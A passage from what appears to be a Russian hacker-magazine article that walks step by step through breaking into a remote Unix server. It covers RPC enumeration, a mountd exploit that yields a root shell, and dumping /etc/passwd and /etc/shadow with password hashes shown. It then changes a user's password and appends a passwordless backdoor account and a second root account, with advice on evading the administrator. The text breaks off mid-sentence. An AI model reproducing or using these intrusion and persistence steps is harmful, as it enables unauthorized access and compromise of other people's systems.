Электронная библиотека
Хакер
Рубрика: Юниксоид
Xakep Online -> Журнал, номер #008, стр. 008-034-3
hax0r# rpcinfo -p satan.****.ru
program vers proto port
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100005 1 udp 691 mountd <- Использовать будем порт UDP
100005 2 udp 691 mountd
100005 1 tcp 694 mountd
100005 2 tcp 694 mountd
100003 2 udp 2049 nfs
100003 2 tcp 2049 nfs
Определив UDP порт демона, применим mountd эксплоит (humpdee или ADMmountd).
hax0r# ./humpdee satan.****.ru 691
Got Shell
id
uid=0(root) gid=0(root) groups=0(root)
Существуют эксплоиты и для других демонов, но я не буду рассказывать о них
подробно, а просто перечислю: imap (ver9.0-10.232), qpop (ver2.2-2.4b2), named, sendmail, wu-ftpd (ver12-18), mountd и многие другие.
Этими способами мы получали доступ к системе с правами root, но это еще не полноценный шелл. Нам нужно добавить пользователя. Можно сменить пароль уже у существующего пользователя или добавить своего. Но для начала посмотрим, какие пользователи уже есть (это пишем после получения рутшелла)
Вот пример двух пользователей:
#cat /etc/passwd
root:x:0:0::/root:/bin/bash
пароль(1) group id домашняя папка
\ / /
solo:x:1003:100:shiva okosara:/home/solo:/bin/bash
\ \ \ \
логин user id gecos шелл
информация
о пользователе
Пароль в файле хранится в DES шифровке (про John The Ripper все слышали? Я думаю, все, поэтому про дешифровку писать не будем). А если в поле пароля стоит x или *, как в нашем случае, это значит: пользователь заблокирован или стоит shadow, попробуем посмотреть тогда shadow:
#cat /etc/shadow
root:S7ydQTppJxub6:10269:0:::::
solo:wpmtJLstbtqgd:10781:0:99999:7:::
Вот и пароли в DES :). Да... мы же хотели получить полноценный доступ к системе. Для смены пароля уже существующего пользователя просто наберем:
passwd solo
satan666
satan666
Теперь твой логин solo, а пароль satan666, но у пользователя solo обычные права, да и когда он заметит, что его пароль сменен, администратор может просечь, в чем дело :). Поэтому добавим лучше своего пользователя, даже двух (если мы создадим одного с правами root, то на некоторых системах нельзя будет зайти удаленно). Мы создадим одного - обычного, а с него уже будем переходить на другого - суперюзера - с помощью команды su:
echo "mal:x:666:100:Nakuva Satanium:/home/mal:/bin/bash" >> /etc/passwd
echo "mal::10666:0:99999:7:::" >> /etc/shadow
mkdir /home/mal
chown mal /home/mal
chmod 700 /home/mal
Это мы добавили обычного пользователя mal, теперь повторим то же самое сменив имя , а вместо UID и GID поставим 0. Что мы имеем? У нас есть один обычный беспарольный пользователь mal, с помощью которого мы заходим в систему (можно сразу сменить свой пароль с помощью команды passwd из шелла) и один суперпользователь. Чтобы получить полный доступ к системе, зайдя с логином mal наберем: